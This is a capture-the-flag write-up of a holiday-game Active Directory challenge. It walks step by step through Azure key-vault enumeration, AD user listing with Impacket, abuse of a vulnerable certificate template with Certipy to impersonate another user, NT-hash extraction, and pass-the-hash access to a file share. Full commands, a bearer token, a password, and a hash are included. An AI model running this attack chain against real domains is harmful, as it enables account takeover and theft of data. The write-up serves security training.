📒Active Directory

Steampunk Island: Coggoggle Marina

Conversation with Ribb

Hello, I'm Ribb Bonbowford. Nice to meet you!

Oh golly! It looks like Alabaster deployed some vulnerable Azure Function App Code he got from ChatNPT.

Don't get me wrong, I'm all for testing new technologies. The problem is that Alabaster didn't review the generated code and used the Geese Islands Azure production environment for his testing.

I'm worried because our Active Directory server is hosted there and Wombley Cube's research department uses one of its fileshares to store their sensitive files.

I'd love for you to help with auditing our Azure and Active Directory configuration and ensure there's no way to access the research department's data.

Since you have access to Alabaster's SSH account that means you're already in the Azure environment. Knowing Alabaster, there might even be some useful tools in place already.

For this challenge, we are tasked with performing a security audit of the Active Directory environment that is tied to the prior challenge, Certificate SSHenanigans. Solving this challenge involved enumeration of Azure REST API endpoints to find domain information & credentials. Then, using all of that to identify & exploit certificate vulnerabilites in the Active Directory environment.

We start out with our ssh connection as alabaster from the prior challenge. We can send a curl request to an api endpoint with our token from the prior challenge to enumerate key vaults.

alabaster@ssh-server-vm:~$ curl https://management.azure.com/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.KeyVault/vaults?api-version=2022-07-01 -H "Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSIsImtpZCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tLyIsImlzcyI6Imh0dHBzOi8vc3RzLndpbmRvd3MubmV0LzkwYTM4ZWRhLTQwMDYtNGRkNS05MjRjLTZjYTU1Y2FjYzE0ZC8iLCJpYXQiOjE3MDQyNTQ1NTQsIm5iZiI6MTcwNDI1NDU1NCwiZXhwIjoxNzA0MzQxMjU0LCJhaW8iOiJFMlZnWUxoZm5lOHNJUHAxSWRPbVdURTZwb2NyQUE9PSIsImFwcGlkIjoiYjg0ZTA2ZDMtYWJhMS00YmNjLTk2MjYtMmUwZDc2Y2JhMmNlIiwiYXBwaWRhY3IiOiIyIiwiaWRwIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvOTBhMzhlZGEtNDAwNi00ZGQ1LTkyNGMtNmNhNTVjYWNjMTRkLyIsImlkdHlwIjoiYXBwIiwib2lkIjoiNjAwYTNiYzgtN2UyYy00NGU1LThhMjctMThjM2ViOTYzMDYwIiwicmgiOiIwLkFGRUEybzZqa0FaQTFVMlNUR3lsWEt6QlRVWklmM2tBdXRkUHVrUGF3ZmoyTUJQUUFBQS4iLCJzdWIiOiI2MDBhM2JjOC03ZTJjLTQ0ZTUtOGEyNy0xOGMzZWI5NjMwNjAiLCJ0aWQiOiI5MGEzOGVkYS00MDA2LTRkZDUtOTI0Yy02Y2E1NWNhY2MxNGQiLCJ1dGkiOiI3dnNWSGdIRURVZVZudDRja2YybUJnIiwidmVyIjoiMS4wIiwieG1zX2F6X3JpZCI6Ii9zdWJzY3JpcHRpb25zLzJiMDk0MmYzLTliY2EtNDg0Yi1hNTA4LWFiZGFlMmRiNWU2NC9yZXNvdXJjZWdyb3Vwcy9ub3J0aHBvbGUtcmcxL3Byb3ZpZGVycy9NaWNyb3NvZnQuQ29tcHV0ZS92aXJ0dWFsTWFjaGluZXMvc3NoLXNlcnZlci12bSIsInhtc19jYWUiOiIxIiwieG1zX21pcmlkIjoiL3N1YnNjcmlwdGlvbnMvMmIwOTQyZjMtOWJjYS00ODRiLWE1MDgtYWJkYWUyZGI1ZTY0L3Jlc291cmNlZ3JvdXBzL25vcnRocG9sZS1yZzEvcHJvdmlkZXJzL01pY3Jvc29mdC5NYW5hZ2VkSWRlbnRpdHkvdXNlckFzc2lnbmVkSWRlbnRpdGllcy9ub3J0aHBvbGUtc3NoLXNlcnZlci1pZGVudGl0eSIsInhtc190Y2R0IjoxNjk4NDE3NTU3fQ.zFksRV5m6St57zmMuLWaW_u-LFhK7aTQeXfOzhTuAv-kvSKoe6zlh1fYTsMNNShn_6XA_4pVfHN-5eLrqvbua3kfsdSTzqwkb11I3dDDpnST1jk74OOzAiN9SHmlrd0f7ahVbkNl45cf8it6sQQ6mM0PF-8DQTbhTPmWcIx9CUzdc7fcbx8mP_I7U04z6Y6zalHqk07J-zieKz-5KmVDrDvGIL0ZlUcSFd-tweo4bs6WD5sHiQxyceB_EoYazuKSn2Vhp5qamfXKNAe9aXbx6W_B8rUAZ8XXn2Z-w-ERSHa3viwpVYI1KiELxLu6uYg90DgVg8mwWpB3TkZDsDqflw"
{"value":[{"id":"/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.KeyVault/vaults/northpole-it-kv","name":"northpole-it-kv","type":"Microsoft.KeyVault/vaults","location":"eastus","tags":{},"systemData":{"createdBy":"[email protected]","createdByType":"User","createdAt":"2023-10-30T13:17:02.532Z","lastModifiedBy":"[email protected]","lastModifiedByType":"User","lastModifiedAt":"2023-10-30T13:17:02.532Z"},"properties":{"sku":{"family":"A","name":"Standard"},"tenantId":"90a38eda-4006-4dd5-924c-6ca55cacc14d","accessPolicies":[],"enabledForDeployment":false,"enabledForDiskEncryption":false,"enabledForTemplateDeployment":false,"enableSoftDelete":true,"softDeleteRetentionInDays":90,"enableRbacAuthorization":true,"vaultUri":"https://northpole-it-kv.vault.azure.net/","provisioningState":"Succeeded","publicNetworkAccess":"Enabled"}},{"id":"/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.KeyVault/vaults/northpole-ssh-certs-kv","name":"northpole-ssh-certs-kv","type":"Microsoft.KeyVault/vaults","location":"eastus","tags":{},"systemData":{"createdBy":"[email protected]","createdByType":"User","createdAt":"2023-11-12T01:47:13.059Z","lastModifiedBy":"[email protected]","lastModifiedByType":"User","lastModifiedAt":"2023-11-12T01:50:52.742Z"},"properties":{"sku":{"family":"A","name":"standard"},"tenantId":"90a38eda-4006-4dd5-924c-6ca55cacc14d","accessPolicies":[{"tenantId":"90a38eda-4006-4dd5-924c-6ca55cacc14d","objectId":"0bc7ae9d-292d-4742-8830-68d12469d759","permissions":{"keys":["all"],"secrets":["all"],"certificates":["all"],"storage":["all"]}},{"tenantId":"90a38eda-4006-4dd5-924c-6ca55cacc14d","objectId":"1b202351-8c85-46f1-81f8-5528e92eb7ce","permissions":{"secrets":["get"]}}],"enabledForDeployment":false,"enableSoftDelete":true,"softDeleteRetentionInDays":90,"vaultUri":"https://northpole-ssh-certs-kv.vault.azure.net/","provisioningState":"Succeeded","publicNetworkAccess":"Enabled"}}],"nextLink":"https://management.azure.com/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.KeyVault/vaults?api-version=2022-07-01&$skiptoken=bm9ydGhwb2xlLXNzaC1jZXJ0cy1rdg=="}

The next step is to get a vault cookie from the API endpoint & then use that cookie to enumerate domain information through the key vault identified in our last step.

Next we use these credentials to: A) Enumerate other users on the machine using the Impacket tools conveniently placed on the machine. We identify wombleycube in this step as a target user.

alabaster@ssh-server-vm:/dev/shm/sleepystitch33$ ~/impacket/GetADUsers.py -all -dc-ip 10.0.0.53 northpole.local/elfy:'J4`ufC49/J4766'
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Querying 10.0.0.53 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
alabaster                                             2024-01-03 01:03:30.006816  2024-01-03 01:16:54.252028 
Guest                                                 <never>              <never>             
krbtgt                                                2024-01-03 01:10:59.312257  <never>             
elfy                                                  2024-01-03 01:13:03.950311  2024-01-03 06:35:05.489230 
wombleycube                                           2024-01-03 01:13:04.075313  2024-01-03 07:15:31.548546 
alabaster@ssh-server-vm:/dev/shm/sleepystitch33$

B) Look for certificate vulnerabilities that we can exploit to gain access to wombley's account. We can find that there

alabaster@ssh-server-vm:/dev/shm/sleepystitch33$ /home/alabaster/impacket/certipy find -u elfy@northpole^Cocal -p Passw0rd -dc-ip 172.16.126.128
alabaster@ssh-server-vm:/dev/shm/sleepystitch33$ ~/impacket/certipy find -u [email protected] -p 'J4`ufC49/J4766' -dc-ip 10.0.0.53                    
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'northpole-npdc01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'northpole-npdc01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'northpole-npdc01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'northpole-npdc01-CA'
[*] Saved BloodHound data to '20240103070919_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20240103070919_Certipy.txt'
[*] Saved JSON output to '20240103070919_Certipy.json'
alabaster@ssh-server-vm:/dev/shm/sleepystitch33$

Our output identified NorthPoleUsers as a vulnerable template.

From here, we can exploit the certificate vulnerability using certipy. We can use this to request a certificate as another user, in this case WombleyCube

alabaster@ssh-server-vm:/dev/shm/sleepystitch33$ certipy req -u '[email protected]' -p'J4`ufC49/J4766' -dc-ip '10.0.0.53' -target 'npdc01.northpole.local' -ca 'northpole-npdc01-CA' -template 'NorthPoleUsers' -upn '[email protected]'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 68
[*] Got certificate with UPN '[email protected]'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'wombleycube.pfx'
alabaster@ssh-server-vm:/dev/shm/sleepystitch33$

alabaster@ssh-server-vm:/dev/shm/sleepystitch33$ certipy auth -pfx 'wombleycube.pfx' -username 'wombleycube' -domain 'northpole.local' -dc-ip 10.0.0.53    
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'wombleycube.ccache'
[*] Trying to retrieve NT hash for 'wombleycube'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:5740373231597863662f6d50484d3e23

Then, we authenticate the certificate against certipy in order to get an NT hash.

The NT hash allows us to authenticate as wombleycube using SMBClient to access files on the FileShare share. We get a bunch of cookie recipes! Plus, a passphrase for the Door Access Speaker, & the flag for our challenge.

alabaster@ssh-server-vm:/dev/shm/sleepystitch33$ /home/alabaster/impacket/smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:5740373231597863662f6d50484d3e23 northpole.local/[email protected]
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# shares
ADMIN$
C$
D$
FileShare
IPC$
NETLOGON
SYSVOL
# cd FileShare
[-] No share selected
# use FileShare
# ls
drw-rw-rw-          0  Wed Jan  3 01:13:58 2024 .
drw-rw-rw-          0  Wed Jan  3 01:13:55 2024 ..
-rw-rw-rw-     701028  Wed Jan  3 01:13:58 2024 Cookies.pdf
-rw-rw-rw-    1521650  Wed Jan  3 01:13:58 2024 Cookies_Recipe.pdf
-rw-rw-rw-      54096  Wed Jan  3 01:13:58 2024 SignatureCookies.pdf
drw-rw-rw-          0  Wed Jan  3 01:13:58 2024 super_secret_research
-rw-rw-rw-        165  Wed Jan  3 01:13:58 2024 todo.txt
#

PreviousCertificate SSHenanigans NextSpace Island Door Access Speaker

Last updated 1 year ago